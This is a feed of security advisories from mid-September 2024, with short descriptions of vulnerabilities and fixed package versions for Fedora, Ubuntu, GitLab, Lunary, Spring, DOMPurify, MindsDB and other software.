11.09.2024 20:31:07	maven	[MAVEN:GHSA-8259-2X72-2GVC] Eclipse Dataspace Components's ConsumerPullTransferTokenValidationApiController doesn't check for token validit (moderate)	In Eclipse Dataspace Components, from version 0.5.0 and before version 0.9.0, the ConsumerPullTransferTokenValidationApiController does not check for token validity (expiry, not-before, issuance date), which can allow an attacker to bypass the check for token expiration. The issue requires to have a dataplane configured to support http proxy consumer pull AND include the module "transfer-data-plane". The affected code was marked deprecated from the version 0.6.0 in favour of Dataplane Signaling. In 0.9.0 the vulnerable code has been removed.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-8259-2X72-2GVC
11.09.2024 20:30:49	maven	[MAVEN:GHSA-7GQ2-VWQ9-W8VW] Eclipse Glassfish URL redirection vulnerability (moderate)	In Eclipse Glassfish versions prior to 7.0.10, a URL redirection vulnerability to untrusted sites existed.This vulnerability is caused by the vulnerability (CVE-2023-41080) in the Apache code included in GlassFish.This vulnerability only affects applications that are explicitly deployed to the root context ('/').	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-7GQ2-VWQ9-W8VW
12.09.2024 03:00:00	freebsd	[FREEBSD:BCC8B21E-7122-11EF-BECE-2CF05DA270F3] Gitlab -- vulnerabilities	Gitlab reports: Execute environment stop actions as the owner of the stop action job Prevent code injection in Product Analytics funnels YAML SSRF via Dependency Proxy Denial of Service via sending a large glm_source parameter CI_JOB_TOKEN can be used to obtain GitLab session token Variables from settings are not overwritten by PEP if a template is included Guests can disclose the full source code of projects using custom group-level templates IdentitiesController allows linking of arbitrary unclaimed provider identities Open redirect in repo/tree/:id endpoint can lead to account takeover through broken OAuth flow Open redirect in release permanent links can lead to account takeover through broken OAuth flow Guest user with Admin group member permission can edit custom role to gain other permissions Exposure of protected and masked CI/CD variables by abusing on-demand DAST Credentials disclosed when repository mirroring fails Commit information visible through release atom endpoint for guest users Dependency Proxy Credentials are Logged in Plaintext in graphql Logs User Application can spoof the redirect url Group Developers can view group runners information	https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:BCC8B21E-7122-11EF-BECE-2CF05DA270F3
14.09.2024 05:02:05	fedora	[FEDORA-2024-0a4a65f805] Fedora 40: chromium (high)	update to 128.0.6613.137 * High CVE-2024-8636: Heap buffer overflow in Skia * High CVE-2024-8637: Use after free in Media Router * High CVE-2024-8638: Type Confusion in V8 * High CVE-2024-8639: Use after free in Autofill	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-0a4a65f805
14.09.2024 05:01:59	fedora	[FEDORA-2024-1d0cb3b43f] Fedora 40: python3.12, python3-docs (high)	This is the sixth maintenance release of Python 3.12Python 3.12 is the newest major release of the Python programming language, andit contains many new features and optimizations. 3.12.6 is the latestmaintenance release, containing about 90 bugfixes, build improvements anddocumentation changes since 3.12.5. This is an expedited release to address thefollowing security issues:gh-123067: Fix quadratic complexity in parsing "-quoted cookie values withbackslashes by http.cookies. Fixes CVE-2024-7592.gh-121285: Remove backtracking from tarfile header parsing for hdrcharset, PAX,and GNU sparse headers. That's CVE-2024-6232.gh-102988: email.utils.getaddresses() and email.utils.parseaddr() now return('', '') 2-tuples in more situations where invalid email addresses areencountered instead of potentially inaccurate values. Add optional strictparameter to these two functions: use strict=False to get the old behavior,accept malformed inputs. getattr(email.utils, 'supports_strict_parsing', False)can be use to check if the strict paramater is available. This improves theCVE-2023-27043 fix.gh-123270: Sanitize names in zipfile.Path to avoid infinite loops (gh-122905)without breaking contents using legitimate characters. That's CVE-2024-8088.	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-1d0cb3b43f
14.09.2024 05:01:22	fedora	[FEDORA-2024-c7b547bec5] Fedora 40: mingw-expat (critical)	Update to expat-2.6.3.	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-c7b547bec5
14.09.2024 05:01:21	fedora	[FEDORA-2024-e8f7a74693] Fedora 40: clamav (high)	Update to 1.0.7CVE-2024-20506: Changed the logging module to disable following symlinks onLinux and Unix systems so as to prevent an attacker with existing access to the'clamd' or 'freshclam' services from using a symlink to corrupt system files.CVE-2024-20505: Fixed a possible out-of-bounds read bug in the PDF file parserthat could cause a denial-of-service (DoS) condition.	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-e8f7a74693
14.09.2024 04:26:42	fedora	[FEDORA-2024-e77ad5f585] Fedora 39: thunderbird	Update to 115.15.0https://www.thunderbird.net/en-US/thunderbird/115.15.0esr/releasenotes/	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-e77ad5f585
14.09.2024 04:26:36	fedora	[FEDORA-2024-e86a48cd72] Fedora 39: mingw-expat (critical)	Update to expat-2.6.3.	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-e86a48cd72
14.09.2024 04:26:31	fedora	[FEDORA-2024-318343049c] Fedora 39: apr (medium)	This update to the apr package fixes a security issue in the handling of sharedmemory permissions. SECURITY: CVE-2023-49582: Apache Portable Runtime (APR): Unexpected lax shared memory permissions (cve.mitre.org) Lax permissions set by the Apache Portable Runtime library on Unix platforms would allow local users read access to named shared memory segments, potentially revealing sensitive application data.	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-318343049c
14.09.2024 00:05:31	fedora	[FEDORA-2024-55a5adeec4] Fedora 41: firefox	PipeWire camera support: backport set of upstream patchesNew upstream update (130.0)	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-55a5adeec4
14.09.2024 00:05:08	fedora	[FEDORA-2024-9a87127dd0] Fedora 41: mbedtls3.6 (medium)	Update to 3.6.1Release notes: https://github.com/Mbed-TLS/mbedtls/releases/tag/mbedtls-3.6.1Update to 3.6.0	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-9a87127dd0
14.09.2024 00:03:14	fedora	[FEDORA-2024-9c7bbee0f0] Fedora 41: libcoap (high)	Update to 4.3.5 GA	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-9c7bbee0f0
14.09.2024 00:03:10	fedora	[FEDORA-2024-e109b67926] Fedora 41: chromium (high)	update to 128.0.6613.119High CVE-2024-8362: Use after free in WebAudioHigh CVE-2024-7970: Out of bounds write in V8	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-e109b67926
14.09.2024 00:03:09	fedora	[FEDORA-2024-48e080c52f] Fedora 41: vim (medium)	Security fix for CVE-2024-45306patchlevel 703Security fixes for CVE-2024-43374, CVE-2024-43802	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-48e080c52f
14.09.2024 00:03:02	fedora	[FEDORA-2024-cfcd6258fa] Fedora 41: ruby (medium)	Upgrade to Ruby 3.3.5.	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-cfcd6258fa
14.09.2024 00:02:48	fedora	[FEDORA-2024-48fd84da22] Fedora 41: mingw-python3	Backport patch for CVE-2024-8088	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-48fd84da22
14.09.2024 00:02:46	fedora	[FEDORA-2024-194cb0840b] Fedora 41: thunderbird	Update to 128.2.0https://www.thunderbird.net/en-US/thunderbird/128.2.0esr/releasenotes/	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-194cb0840b
14.09.2024 00:02:44	fedora	[FEDORA-2024-c5d55d5845] Fedora 41: mingw-expat (critical)	Update to expat-2.6.3.	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-c5d55d5845
14.09.2024 00:02:43	fedora	[FEDORA-2024-0d7eb64d90] Fedora 41: clamav (high)	Update to 1.0.7CVE-2024-20506: Changed the logging module to disable following symlinks onLinux and Unix systems so as to prevent an attacker with existing access to the'clamd' or 'freshclam' services from using a symlink to corrupt system files.CVE-2024-20505: Fixed a possible out-of-bounds read bug in the PDF file parserthat could cause a denial-of-service (DoS) condition.	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-0d7eb64d90
14.09.2024 00:02:25	fedora	[FEDORA-2024-396c94f0a3] Fedora 41: python-django	urlize and urlizetrunc were subject to a potential denial-of-service attack viavery large inputs with a specific sequence of characters.	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-396c94f0a3
14.09.2024 00:02:20	fedora	[FEDORA-2024-bd2368f66a] Fedora 41: haproxy (high)	Update to 3.0.4 (CVE-2024-45506, #2309472)	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-bd2368f66a
14.09.2024 00:02:18	fedora	[FEDORA-2024-b08735561c] Fedora 41: python-django4.2	urlize and urlizetrunc were subject to a potential denial-of-service attack viavery large inputs with a specific sequence of characters.	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-b08735561c
14.09.2024 00:01:24	fedora	[FEDORA-2024-3d2a146701] Fedora 41: osc	New upstream release 1.9.1, fixes CVE-2024-22034	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-3d2a146701
14.09.2024 00:01:13	fedora	[FEDORA-2024-d4bcb0da46] Fedora 41: mbedtls (medium)	Update to 2.28.9Release notes: https://github.com/Mbed-TLS/mbedtls/releases/tag/mbedtls-2.28.9	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-d4bcb0da46
14.09.2024 00:01:11	fedora	[FEDORA-2024-19e63ed69e] Fedora 41: nextcloud (high)	29.0.6 release RHBZ#2305125 RHBZ#2309499 fixes CVE-2024-39338	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-19e63ed69e
14.09.2024 00:01:10	fedora	[FEDORA-2024-e089551039] Fedora 41: wolfssl (high)	RHBZ#2308628 RHBZ#2308629 RHBZ#2308630 RHBZ#2308631 fixed in 5.7.2 release	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-e089551039
14.09.2024 00:00:31	fedora	[FEDORA-2024-90f1d7e116] Fedora 41: seamonkey	Update to 2.53.19	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-90f1d7e116
13.09.2024 23:59:26	fedora	[FEDORA-2024-67a38b081a] Fedora 41: microcode_ctl (high)	Update to upstream 2.1-44. 20240813Update of 06-55-07/0xbf (CLX-SP/W/X B1/L1) microcode from revision 0x5003605 upto 0x5003707;Update of 06-55-0b/0xbf (CPX-SP A1) microcode from revision 0x7002802 up to0x7002904;Update of 06-6a-06/0x87 (ICX-SP D0) microcode from revision 0xd0003d1 up to0xd0003e7;Update of 06-6c-01/0x10 (ICL-D B0) microcode from revision 0x1000290 up to0x10002b0;Update of 06-7e-05/0x80 (ICL-U/Y D1) microcode from revision 0xc4 up to 0xc6;Update of 06-8c-01/0x80 (TGL-UP3/UP4 B1) microcode from revision 0xb6 up to0xb8;Update of 06-8c-02/0xc2 (TGL-R C0) microcode from revision 0x36 up to 0x38;Update of 06-8d-01/0xc2 (TGL-H R0) microcode from revision 0x50 up to 0x52;Update of 06-8e-09/0x10 (AML-Y 2+2 H0) microcode from revision 0xf4 up to 0xf6;Update of 06-8e-09/0xc0 (KBL-U/U 2+3e/Y H0/J1) microcode from revision 0xf4 upto 0xf6;Update of 06-8e-0a/0xc0 (CFL-U 4+3e D0, KBL-R Y0) microcode from revision 0xf4up to 0xf6;Update of 06-8e-0b/0xd0 (WHL-U W0) microcode from revision 0xf4 up to 0xf6;Update of 06-8e-0c/0x94 (AML-Y 4+2 V0, CML-U 4+2 V0, WHL-U V0) microcode fromrevision 0xfa up to 0xfc;Update of 06-96-01/0x01 (EHL B1) microcode from revision 0x19 up to 0x1a;Update of 06-9e-0a/0x22 (CFL-H/S/Xeon E U0) microcode from revision 0xf6 up to0xf8;Update of 06-9e-0b/0x02 (CFL-E/H/S B0) microcode from revision 0xf4 up to 0xf6;Update of 06-9e-0c/0x22 (CFL-H/S/Xeon E P0) microcode from revision 0xf6 up to0xf8;Update of 06-9e-0d/0x22 (CFL-H/S/Xeon E R0) microcode from revision 0xfc up to0x100;Update of 06-a5-02/0x20 (CML-H R1) microcode from revision 0xfa up to 0xfc;Update of 06-a5-03/0x22 (CML-S 6+2 G1) microcode from revision 0xfa up to 0xfc;Update of 06-a5-05/0x22 (CML-S 10+2 Q0) microcode from revision 0xfa up to 0xfc;Update of 06-a6-00/0x80 (CML-U 6+2 A0) microcode from revision 0xfa up to 0xfe;Update of 06-a6-01/0x80 (CML-U 6+2 v2 K1) microcode from revision 0xfa up to0xfc;Update of 06-a7-01/0x02 (RKL-S B0) microcode from revision 0x5e up to 0x62;Update of 06-aa-04/0xe6 (MTL-H/U C0) microcode from revision 0x1c up to 0x1e.Addresses CVE-2024-24853, CVE-2024-24980, CVE-2024-25939	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-67a38b081a
13.09.2024 23:59:08	fedora	[FEDORA-2024-f831fe4030] Fedora 41: apr	Update APR to version 1.7.5.	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-f831fe4030
13.09.2024 23:58:57	fedora	[FEDORA-2024-8142adb4a8] Fedora 41: python3.11	Security fix for CVE-2024-8088	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-8142adb4a8
13.09.2024 23:58:56	fedora	[FEDORA-2024-b673d8c70f] Fedora 41: python3.12	Security fix for CVE-2024-8088	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-b673d8c70f
13.09.2024 23:58:54	fedora	[FEDORA-2024-6140989aaf] Fedora 41: python3.9	Security fix for CVE-2024-8088	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-6140989aaf
13.09.2024 22:34:17	npm	[NPM:GHSA-9JMP-J63G-8X6M] Lunary information disclosure vulnerability (moderate)	An information disclosure vulnerability exists in the lunary-ai/lunary, specifically in the `runs/{run_id}/related` endpoint. This endpoint does not verify that the user has the necessary access rights to the run(s) they are accessing. As a result, it returns not only the specified run but also all runs that have the `run_id` listed as their parent run. This issue affects the main branch, commit a761d833. The vulnerability allows unauthorized users to obtain information about non-public runs and their related runs, given the `run_id` of a public or non-public run.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-9JMP-J63G-8X6M
13.09.2024 22:34:11	npm	[NPM:GHSA-V6X6-4V4X-2FX9] Lunary Cross-Site Request Forgery (CSRF) vulnerability (moderate)	A Cross-Site Request Forgery (CSRF) vulnerability exists in lunary-ai/lunary version 1.2.34 due to overly permissive CORS settings. This vulnerability allows an attacker to sign up for and create projects or use the instance as if they were a user with local access. The main attack vector is for instances hosted locally on personal machines, which are not publicly accessible. The CORS settings in the backend permit all origins, exposing unauthenticated endpoints to CSRF attacks.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-V6X6-4V4X-2FX9
13.09.2024 22:29:16	npm	[NPM:GHSA-W73R-8MM4-CFVF] Lunary Improper Authentication vulnerability (moderate)	A broken access control vulnerability exists prior to commit 1f043d8798ad87346dfe378eea723bff78ad7433 of lunary-ai/lunary. The `saml.ts` file allows a user from one organization to update the Identity Provider (IDP) settings and view the SSO metadata of another organization. This vulnerability can lead to unauthorized access and potential account takeover if the email of a user in the target organization is known.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-W73R-8MM4-CFVF
13.09.2024 22:29:13	npm	[NPM:GHSA-6P2Q-8QFQ-WQ7X] Lunary improper access control vulnerability (moderate)	An improper access control vulnerability exists in lunary-ai/lunary prior to commit 844e8855c7a713dc7371766dba4125de4007b1cf on the main branch. The vulnerability allows an attacker to use the auth tokens issued by the 'invite user' functionality to obtain valid JWT tokens. These tokens can be used to compromise target users upon registration for their own arbitrary organizations. The attacker can invite a target email, obtain a one-time use token, retract the invite, and later use the token to reset the password of the target user, leading to full account takeover.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-6P2Q-8QFQ-WQ7X
13.09.2024 16:48:06	suse	[SUSE-SU-2024:3080-2] Security update for curl (moderate)	Security update for curl	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3080-2
13.09.2024 14:47:02	ubuntu	[USN-7009-1] Linux kernel vulnerabilities	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7009-1
13.09.2024 14:22:12	ubuntu	[USN-7005-2] Linux kernel vulnerabilities	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7005-2
13.09.2024 13:51:48	ubuntu	[USN-7008-1] Linux kernel vulnerabilities	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7008-1
13.09.2024 12:38:11	ubuntu	[USN-7007-1] Linux kernel vulnerabilities	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7007-1
13.09.2024 11:01:57	ubuntu	[USN-7003-3] Linux kernel vulnerabilities	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7003-3
13.09.2024 22:32:24	maven	[MAVEN:GHSA-CX7F-G6MP-7HQM] Path traversal vulnerability in functional web frameworks (high)	Applications serving static resources through the functional web frameworks WebMvc.fn or WebFlux.fn are vulnerable to path traversal attacks. An attacker can craft malicious HTTP requests and obtain any file on the file system that is also accessible to the process in which the Spring application is running.Specifically, an application is vulnerable when both of the following are true: * the web application uses RouterFunctions to serve static resources * resource handling is explicitly configured with a FileSystemResource locationHowever, malicious requests are blocked and rejected when any of the following is true: * the Spring Security HTTP Firewall https://docs.spring.io/spring-security/reference/servlet/exploits/firewall.html is in use * the application runs on Tomcat or Jetty	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-CX7F-G6MP-7HQM
15.09.2024 03:15:05	fedora	[FEDORA-2024-0c6db96fc3] Fedora 41: flatpak (critical)	Update to 1.15.10 (CVE-2024-42472)	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-0c6db96fc3
14.09.2024 21:19:59	slackware	[SSA:2024-258-01] libarchive	New libarchive packages are available for Slackware 15.0 and -current tofix security issues.Here are the details from the Slackware 15.0 ChangeLog```patches/packages/libarchive-3.7.5-i586-1_slack15.0.txz: Upgraded. This update fixes the following security issues: fix multiple vulnerabilities identified by SAST (#2251, #2256) cpio: ignore out-of-range gid/uid/size/ino and harden AFIO parsing (#2258) lzop: prevent integer overflow (#2174) rar4: protect copy_from_lzss_window_to_unp() (#2172, CVE-2024-20696) rar4: fix CVE-2024-26256 (#2269) rar4: fix OOB in delta and audio filter (#2148, #2149) rar4: fix out of boundary access with large files (#2179) rar4: add boundary checks to rgb filter (#2210) rar4: fix OOB access with unicode filenames (#2203) rar5: clear 'data ready' cache on window buffer reallocs (#2265) rpm: calculate huge header sizes correctly (#2158) unzip: unify EOF handling (#2175) util: fix out of boundary access in mktemp functions (#2160) uu: stop processing if lines are too long (#2168) For more information, see: https://www.cve.org/CVERecord?id=CVE-2024-20696 https://www.cve.org/CVERecord?id=CVE-2024-26256 (* Security fix )```Where to find the new packagesThanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated package for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/libarchive-3.7.5-i586-1_slack15.0.txzUpdated package for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/libarchive-3.7.5-x86_64-1_slack15.0.txzUpdated package for Slackware -current:ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/libarchive-3.7.5-i686-1.txzUpdated package for Slackware x86_64 -current:ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/libarchive-3.7.5-x86_64-1.txzMD5 signaturesSlackware 15.0 package:f3b7cdacc3d264f4bcc20f078c0c22b4 libarchive-3.7.5-i586-1_slack15.0.txzSlackware x86_64 15.0 package:2845ee62628435d7995d5351d6e84e79 libarchive-3.7.5-x86_64-1_slack15.0.txzSlackware -current package:cb11536dc6673f3c6b848229129d0363 l/libarchive-3.7.5-i686-1.txzSlackware x86_64 -current package:35ec40489069558505b9db8bd66ca2c2 l/libarchive-3.7.5-x86_64-1.txzInstallation instructions*Upgrade the package as root:`# upgradepkg libarchive-3.7.5-i586-1_slack15.0.txz`	https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-258-01
16.09.2024 12:59:11	ubuntu	[USN-6560-3] OpenSSH vulnerability	OpenSSH could be made to crash or run programs as your loginif it received a specially crafted input.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6560-3
16.09.2024 03:15:48	fedora	[FEDORA-2024-ebf3fe7bc9] Fedora 41: python3.13, python3-docs (high)	Python 3.13.0rc2Security fix for CVE-2024-8088 and CVE-2024-6232	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-ebf3fe7bc9
15.09.2024 05:27:27	fedora	[FEDORA-2024-05d7ee197e] Fedora 39: clamav (high)	Update to 1.0.7CVE-2024-20506: Changed the logging module to disable following symlinks onLinux and Unix systems so as to prevent an attacker with existing access to the'clamd' or 'freshclam' services from using a symlink to corrupt system files.CVE-2024-20505: Fixed a possible out-of-bounds read bug in the PDF file parserthat could cause a denial-of-service (DoS) condition.	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-05d7ee197e
15.09.2024 05:27:25	fedora	[FEDORA-2024-03fd821ae2] Fedora 39: bubblewrap, flatpak (critical)	flatpak 1.15.10 and bubblewrap 0.10.0 updates, which together fix CVE-2024-42472in Flatpak.	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-03fd821ae2
17.09.2024 05:08:06	fedora	[FEDORA-2024-3dbf10c949] Fedora 39: linux-firmware (high)	Update to upstream 20240909:i915: Update MTL DMC v2.23cirrus: cs35l56: Add firmware for Cirrus CS35L54 for some HP laptopsamdgpu: Revert sienna cichlid dmcub firmware updateiwlwifi: add Bz FW for core89-58 releasertl_nic: add firmware rtl8126a-3update MT7921 WiFi/bluetooth device firmwareamdgpu: update DMCUB to v0.0.232.0 for DCN314 and DCN351amdgpu: DMCUB updates forvarious AMDGPU ASICsrtw89: 8922a: add fw format-1 v0.35.41.0update MT7925 WiFi/bluetooth device firmwarertl_bt: Add firmware and config files for RTL8922Artl_bt: Add firmware file for the the RTL8723CS Bluetooth partrtl_bt: de-dupe identical config.bin filesrename rtl8723bs_config-OBDA8723.bin -> rtl_bt/rtl8723bs_config.binUpdate AMD SEV firmwareupdate firmware for MT7996Revert "i915: Update MTL DMC v2.22"ath12k: WCN7850 hw2.0: update board-2.binath11k: WCN6855 hw2.0: update toWLAN.HSP.1.1-03125-QCAHSPSWPL_V1_V2_SILICONZ_LITE-3.6510.41ath11k: WCN6855 hw2.0: update board-2.binath11k: QCA2066 hw2.1: add toWLAN.HSP.1.1-03926.13-QCAHSPSWPL_V2_SILICONZ_CE-2.52297.3ath11k: QCA2066 hw2.1: add board-2.binath11k: IPQ5018 hw1.0: update to WLAN.HK.2.6.0.1-01291-QCAHKSWPL_SILICONZ-1qcom: vpu: add video firmware for sa8775pamdgpu: DMCUB updates for various AMDGPU ASICs	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-3dbf10c949
17.09.2024 05:08:06	fedora	[FEDORA-2024-f2fc325c40] Fedora 39: python3.13	Python 3.13.0rc2	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-f2fc325c40
17.09.2024 03:15:37	fedora	[FEDORA-2024-3cd42e9e29] Fedora 41: linux-firmware (high)	Update to upstream 20240909:i915: Update MTL DMC v2.23cirrus: cs35l56: Add firmware for Cirrus CS35L54 for some HP laptopsamdgpu: Revert sienna cichlid dmcub firmware updateiwlwifi: add Bz FW for core89-58 releasertl_nic: add firmware rtl8126a-3update MT7921 WiFi/bluetooth device firmwareamdgpu: update DMCUB to v0.0.232.0 for DCN314 and DCN351amdgpu: DMCUB updates forvarious AMDGPU ASICsrtw89: 8922a: add fw format-1 v0.35.41.0update MT7925 WiFi/bluetooth device firmwarertl_bt: Add firmware and config files for RTL8922Artl_bt: Add firmware file for the the RTL8723CS Bluetooth partrtl_bt: de-dupe identical config.bin filesrename rtl8723bs_config-OBDA8723.bin -> rtl_bt/rtl8723bs_config.binUpdate AMD SEV firmwareupdate firmware for MT7996Revert "i915: Update MTL DMC v2.22"ath12k: WCN7850 hw2.0: update board-2.binath11k: WCN6855 hw2.0: update toWLAN.HSP.1.1-03125-QCAHSPSWPL_V1_V2_SILICONZ_LITE-3.6510.41ath11k: WCN6855 hw2.0: update board-2.binath11k: QCA2066 hw2.1: add toWLAN.HSP.1.1-03926.13-QCAHSPSWPL_V2_SILICONZ_CE-2.52297.3ath11k: QCA2066 hw2.1: add board-2.binath11k: IPQ5018 hw1.0: update to WLAN.HK.2.6.0.1-01291-QCAHKSWPL_SILICONZ-1qcom: vpu: add video firmware for sa8775pamdgpu: DMCUB updates for various AMDGPU ASICs	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-3cd42e9e29
17.09.2024 01:37:33	npm	[NPM:GHSA-MMHX-HMJR-R674] DOMPurify allows tampering by prototype pollution (high)	It has been discovered that malicious HTML using special nesting techniques can bypass the depth checking added to DOMPurify in recent releases. It was also possible to use Prototype Pollution to weaken the depth check.This renders dompurify unable to avoid XSS attack.Fixed by https://github.com/cure53/DOMPurify/commit/1e520262bf4c66b5efda49e2316d6d1246ca7b21 (3.x branch) and https://github.com/cure53/DOMPurify/commit/26e1d69ca7f769f5c558619d644d90dd8bf26ebc (2.x branch).	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-MMHX-HMJR-R674
16.09.2024 23:21:00	npm	[NPM:GHSA-XGQ9-7GW6-JR5R] Mattermost Desktop App fails to sufficiently configure Electron Fuses (low)	Mattermost Desktop App versions <=5.8.0 fail to sufficiently configure Electron Fuses which allows an attacker to gather Chromium cookies or abuse other misconfigurations via remote/local access.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-XGQ9-7GW6-JR5R
16.09.2024 23:20:50	npm	[NPM:GHSA-5777-RCJJ-9P22] Mattermost Desktop App fails to safeguard screen capture functionality (low)	Mattermost Desktop App versions <=5.8.0 fail to safeguard screen capture functionality which allows an attacker to silently capture high-quality screenshots via JavaScript APIs.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-5777-RCJJ-9P22
16.09.2024 23:19:35	maven	[MAVEN:GHSA-3XQ2-W6J4-C99R] Apache Seata Deserialization of Untrusted Data vulnerability (high)	Deserialization of Untrusted Data vulnerability in Apache Seata. When developers disable authentication on the Seata-Server and do not use the Seata client SDK dependencies, they may construct uncontrolled serialized malicious requests by directly sending bytecode based on the Seata private protocol.This issue affects Apache Seata: 2.0.0, from 1.0.0 through 1.8.0.Users are recommended to upgrade to version 2.1.0/1.8.1, which fixes the issue.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-3XQ2-W6J4-C99R
16.09.2024 23:16:19	maven	[MAVEN:GHSA-46HR-3CQ3-MCGP] OpenDaylight Authentication, Authorization and Accounting (AAA) peer impersonation vulnerability (moderate)	An issue was discovered in OpenDaylight Authentication, Authorization and Accounting (AAA) through 0.19.3. A rogue controller can join a cluster to impersonate an offline peer, even if this rogue controller does not possess the complete cluster configuration information.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-46HR-3CQ3-MCGP
16.09.2024 23:16:15	maven	[MAVEN:GHSA-HV38-H5PJ-C96J] OpenDaylight Model-Driven Service Abstraction Layer (MD-SAL) allows follower controller to set up flow entries (moderate)	In OpenDaylight Model-Driven Service Abstraction Layer (MD-SAL) through 13.0.1, a controller with a follower role can configure flow entries in an OpenDaylight clustering deployment.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-HV38-H5PJ-C96J
16.09.2024 23:14:54	npm	[NPM:GHSA-WJ4J-QC2M-FGH7] Mattermost Desktop App Uncontrolled Search Path Vulnerability (moderate)	Mattermost Desktop App versions <=5.8.0 fail to specify an absolute path when searching the cmd.exe file, which allows a local attacker who is able to put an cmd.exe file in the Downloads folder of a user's machine to cause remote code execution on that machine.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-WJ4J-QC2M-FGH7
16.09.2024 22:20:04	pypi	[PYSEC-2024-77] mindsdb vulnerability	An arbitrary code execution vulnerability exists in versions 23.10.3.0 up to 24.7.4.1 of the MindsDB platform, when the Weaviate integration is installed on the server. If a specially crafted ‘SELECT WHERE’ clause containing Python code is run against a database created with the Weaviate engine, the code will be passed to an eval function and executed on the server.	https://secdb.nttzen.cloud/security-advisory/pypi/PYSEC-2024-77
16.09.2024 22:20:04	pypi	[PYSEC-2024-78] mindsdb vulnerability	An arbitrary code execution vulnerability exists in versions 23.12.4.0 up to 24.7.4.1 of the MindsDB platform, when the ChromaDB integration is installed on the server. If a specially crafted ‘INSERT’ query containing Python code is run against a database created with the ChromaDB engine, the code will be passed to an eval function and executed on the server.	https://secdb.nttzen.cloud/security-advisory/pypi/PYSEC-2024-78
16.09.2024 22:20:04	pypi	[PYSEC-2024-79] mindsdb vulnerability	An arbitrary code execution vulnerability exists in versions 23.10.5.0 up to 24.7.4.1 of the MindsDB platform, when the Microsoft SharePoint integration is installed on the server. For databases created with the SharePoint engine, an ‘INSERT’ query can be used for list creation. If such a query is specially crafted to contain Python code and is run against the database, the code will be passed to an eval function and executed on the server.	https://secdb.nttzen.cloud/security-advisory/pypi/PYSEC-2024-79
